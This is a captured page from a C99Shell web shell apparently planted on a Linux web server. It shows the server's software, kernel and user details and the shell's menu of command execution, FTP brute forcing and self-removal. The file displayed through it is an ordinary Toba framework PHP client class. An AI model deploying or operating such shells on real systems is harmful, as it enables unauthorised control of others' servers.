!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/proyectos/toba_referencia/php/servicios/seguro_configuracion/   drwxrwxr-x
Free 13.84 GB of 61.93 GB (22.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ci_cliente.php (2.62 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
class ci_cliente extends toba_ci
{
    protected 
$s__echo;
    protected 
$s__datos_password;
    protected 
$s__adjunto;
    protected 
$adjunto_respuesta;
    protected 
$datos_persona;
    protected 
$path_servicio "servicios/seguro_configuracion/servicio.php";
    
    function 
ini()
    {
        if (! 
extension_loaded('wsf')) {
            
toba::notificacion()->error("No se encuentra instalada la extensión wsf de php.".
            
" <a href='http://toba.siu.edu.ar/trac/toba/wiki/Referencia/ServiciosWeb'>Ver documentación</a>");
        }
    }
    

    
/**
     * Seguridad configurada en la instalacion
     */
    
function evt__form__enviar($datos)
    {
        
//--1- Arma el mensaje    (incluyendo los headers)
        
$this->s__echo $datos;
        
$opciones = array(
                
'action' => 'test',
        );
        
$mensaje = new toba_servicio_web_mensaje($this->s__echo$opciones);
    
        
//--2- Arma el servicio
        
$opciones = array(
            
'to' => 'http://localhost/'.toba_recurso::url_proyecto().'/servicios.php/serv_seguro_configuracion',
        );
        
$servicio toba::servicio_web('cli_seguro_configuracion'$opciones);
    
        
//-- 3 - Muestra la respuesta
        
$respuesta $servicio->request($mensaje);
        
toba::notificacion()->info(print_r($respuesta->get_array(), true));
    }    
    
    
    
//-----------------------------------------------------------------------------
    //---- Utilidades  -----------------------------------------------------------
    //------------------------------------------------------------------------------
    
    
function post_configurar()
    {
        
parent::post_configurar();
        
$img toba_recurso::imagen_toba('nucleo/php.gif'true);
        
$cliente 'servicios/seguro_configuracion/ci_cliente.php';
        
$url_cliente toba::vinculador()->get_url('toba_editor''30000014', array('archivo' => $cliente), array('prefijo'=>toba_editor::get_punto_acceso_editor()));        
        
$url_servicio toba::vinculador()->get_url('toba_editor''30000014', array('archivo' => $this->path_servicio), array('prefijo'=>toba_editor::get_punto_acceso_editor()));
        
$html "<div style='float:right; background-color:white; padding: 10px'><a target='logger' href='$url_cliente'>$img Ver .php del Cliente</a>";
        
$html .= "<br><a target='logger' href='$url_servicio'>$img Ver .php del Servicio</a>";
        
$url_ejemplos 'http://repositorio.siu.edu.ar/trac/toba/wiki/Referencia/ServiciosWeb';
        
$html .= "<br>Documentación de <a target='_blank' href='$url_ejemplos'>servicios web en toba</a></div>";
        
$html .= $this->pantalla()->get_descripcion();        
        
$this->pantalla()->set_descripcion($html);
    }
    
    function 
formatear_valor($valor)
    {
        
$estilo 'style="background-color: white; border: 1px solid gray; padding: 5px;"';        
        return  
"<pre $estilo>".htmlentities($valor).'</pre>';
    }
    
    
        
    
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4887 ]--